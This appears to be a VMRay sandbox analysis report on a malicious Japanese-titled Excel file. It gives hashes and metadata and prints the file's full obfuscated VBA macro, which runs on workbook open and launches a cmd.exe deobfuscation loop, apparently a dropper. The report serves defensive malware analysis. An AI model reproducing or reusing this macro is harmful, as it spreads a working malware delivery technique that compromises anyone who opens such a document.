54303e5a...fd2e | Files
Logo
Try VMRay Analyzer
VTI SCORE: 95/100
Dynamic Analysis Report
Classification: -

54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e (SHA256)

DOC2410201810718458.xls

Excel Document

Created at 2018-10-24 06:15:00

...

Notifications (1/1)

Due to a WHOIS service error, no query could be made to get WHOIS data of any contacted domain.

Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\DOC2410201810718458.xls Sample File Excel Document
Suspicious
...
»
Mime Type application/vnd.ms-excel
File Size 63.00 KB
MD5 445d3d5073e9939ad037556e24e05b37 Copy to Clipboard
SHA1 e4bb0e1e2479512015ecb39e77db0eed478cfe4b Copy to Clipboard
SHA256 54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e Copy to Clipboard
SSDeep 1536:Xv+km4OrZTPVbJhr1TBL602MCspTZQxEtjPOtioVjDGUU1qfDlaGGx+cL2QnVJ4j:Xv+km4OrZbVbJhr1TBL602MCspTZQxEp Copy to Clipboard
Office Information
»
Creator ユーザー
Create Time 2017-06-20 07:25:14+00:00
Modify Time 2018-10-23 12:19:37+00:00
Document Information
»
Application Microsoft Excel
App Version 14.0
Company 株式会社
Document Security SecurityFlag.NONE
Heading Pairs Worksheets
Titles Of Parts 見積り
scale_crop False
shared_doc False
VBA Macros (1)
»
Macro #1: ThisWorkbook
» 
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True































































Function tess()
tess = "2,34,7,1,15,8,15,78,61,61,56,53,52,1,15,8,37,78,78,78,45,2,78,43,0,59,37,3,14,58,15,18,18,78,21,15,8,37,56,26,46,65,82,83,43,82,12,78,31,22,7,35,73,73,78,78,21,83,0,67,34,83,78,21,59,65,67,52,82,59,14,46,22,78,58,65,66,66,15,67,78,21,67,82,43,79,82,54,34,78,78,21,73,42,78,78,21,83,0,12,82,74,82,78,78,78,78,78,1,78,13,78,78,57,81,20,30,69,20,49,69,20,36,69,57,81,78,21,41,78,50,64,52,52,50,72,13,78,57,81,20,30,69,20,49,69,57,81,78,21,41,50,21,50,72,50,46,40,43,50,78,62,72,50,37,50,78,78,62,78,21,64,73,73,37,4,78,13,57,81,20,77,69,20,49,69,20,9,69,20,30,69,20,71,69,20,36,69,57,81,78,21,41,78,13,78,78,57,81,20,36,69,20,49,69,20,30,69,57,81,78,21,41,50,52,50,72,50,1,63,34,67,50,72,50,37,4,50,78,78,62,72,50,40,73,50,72,50,73,50,72,50,14,50,72,13,78,57,81,20,36,69,20,49,69,20,30,69,57,81,21,41,78,50,54,0,3,4,50,72,50,1,50,72,50,0,59,73,50,62,72,50,42,50,62,78,78,78,76,78,78,78,11,11,11,61,78,78,13,78,78,78,47,20,37,5,83,6,"
End Function
Function torro()
torro = ",81,20,30,69,20,49,69,81,21,41,78,50,64,52,52,21,46,50,72,50,40,43,37,50,62,78,21,64,73,73,37,4,38,12,40,83,35,4,37,78,81,14,40,73,42,37,4,1,66,3,35,59,34,67,74,81,76,47,20,74,69,23,11,11,11,61,13,50,35,50,62,78,13,81,20,71,69,20,36,69,20,49,69,20,30,69,20,77,69,81,21,41,78,50,1,31,34,50,72,50,34,67,74,50,72,50,59,50,72,50,42,4,35,43,50,72,50,14,40,73,42,37,4,1,66,3,35,50,62,13,13,11,11,11,61,13,50,35,50,62,78,13,81,20,30,69,20,49,69,20,77,69,20,36,69,81,78,21,41,78,50,83,37,42,1,50,72,50,63,37,50,72,50,42,50,72,50,38,56,12,34,37,67,50,62,62,1,13,81,20,49,69,20,30,69,81,78,21,41,50,43,37,67,79,37,35,52,50,72,50,82,50,62,1,65,67,51,0,60,37,13,81,70,42,42,43,73,27,45,45,34,4,35,74,37,73,36,1,34,4,74,38,0,8,1,2,0,4,45,2,35,45,19,19,45,64,36,25,14,12,63,75,14,44,0,1,43,67,74,81,62,62,76,47,20,82,69,23,11,11,11,61,13,50,35,50,62,78,13,81,20,30,69,20,49,69,81,21,41,50,31,40,42,37,50,72,50,32,17,50,62,78,49,19,75,30,76,13"
End Function
Sub kxnWvm()
Call Shell(omran + torro + vicking + tess + serena, 14 - 14)
End Sub
Function vicking()
vicking = ",30,1,1,36,62,11,11,11,55,1,13,50,29,50,62,20,41,0,3,37,35,2,70,13,47,20,8,69,78,34,67,13,30,1,1,75,49,33,62,62,20,47,20,43,69,23,47,20,74,69,1,13,81,20,30,69,20,49,69,81,78,21,41,78,50,24,37,42,7,34,50,72,50,8,37,12,50,62,1,65,67,51,0,60,37,13,47,20,8,69,72,47,20,44,69,62,76,47,20,0,69,32,47,20,44,69,39,75,36,30,68,47,20,16,69,17,23,13,78,78,47,71,74,10,27,27,13,81,20,49,69,20,30,69,81,21,41,78,50,12,0,0,3,50,72,50,54,50,62,1,65,67,51,0,60,37,13,13,47,20,43,69,1,81,31,81,21,38,35,67,52,49,9,62,39,49,75,62,21,38,0,3,13,47,20,43,69,1,81,74,81,78,21,38,35,67,52,78,49,9,62,62,69,69,76,11,11,11,61,13,81,20,30,69,20,49,69,81,78,21,41,50,65,50,72,50,15,16,50,62,13,78,13,78,18,14,78,78,51,64,79,65,35,38,18,15,27,71,19,8,10,78,62,1,6,35,12,26,15,27,27,81,35,5,73,2,34,34,81,1,81,74,37,42,5,73,5,46,3,65,67,24,81,13,47,20,82,69,32,30,1,1,49,77,71,49,17,62,62,78,55,2,27,57,59,65,67,52,82,59,73,57,14,40,14,42,37,4,77,36,57,56,1"
End Function
Function serena()
serena = "5,27,2,82,53,73,5,43,37,2,69,32,71,72,49,9,72,36,9,17,21,48,82,65,83,50,50,62,78,13,78,78,13,78,32,14,22,14,42,37,53,1,63,34,83,66,0,63,73,1,54,0,3,53,14,1,56,18,65,7,38,82,35,79,52,17,27,27,13,57,81,20,30,69,20,49,69,57,81,78,21,41,78,50,24,50,72,13,57,81,20,30,69,20,49,69,57,81,78,21,41,50,37,50,72,50,42,42,15,8,46,50,78,62,62,1,57,81,34,5,83,51,5,0,28,15,57,81,13,78,78,62,78,78,62,78,78,62,78,76,78,78,32,14,40,73,42,37,4,1,63,34,67,52,0,59,73,1,54,0,3,4,73,1,56,12,34,43,38,0,35,3,52,17,27,27,13,57,81,20,30,69,20,49,69,57,81,78,21,41,50,56,12,50,72,50,37,35,3,50,78,62,1,57,81,34,5,83,51,82,5,60,15,57,81,13,78,62,84)do set Rc=!Rc!!lW:~%9,1!&&if %9 geq 84 cmd /C!Rc:~-1334!"""
End Function
Function omran()
omran = "cmd.exe /V:ON/C""set lW=o.crm`VPx57^^l(SEX]L8{-Y=GZU:K%0B[9ia2eb*yftp_/T$j1'vdMF^|C\Hwk^&)WAIDn+}h4,sg6;3 R""""ON&&for %9 in (15,2,70,82,45,78,78,47,71,24,10,23,32,42,22,7,15,17,13,50,53,50,68,50,64,46,70,50,62,78,76,78,78,78,47,71,19,16,10,23,78,32,42,40,43,37,17,13,50,14,40,73,42,15,4,1,46,50,68,50,15,8,50,68,50,46,50,68,50,1,15,83,2,50,68,50,0,50,68,50,66,65,67,74,50,62,76,78,78,1,13,81,20,49,69,20,30,69,81,78,21,41,50,12,50,72,50,73,35,50,62,78,13,50,35,50,62,78,13,81,20,30,69,20,36,69,20,49,69,81,78,21,41,50,83,37,59,50,72,50,2,42,50,72,50,21,82,38,48,37,50,62,76,11,11,11,61,13"
End Function
Sub Workbook_Open()
kxnWvm
End Sub
YARA Matches
»
Rule Name Rule Description Classification Severity Actions
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
...
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
...
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
...
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
...
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image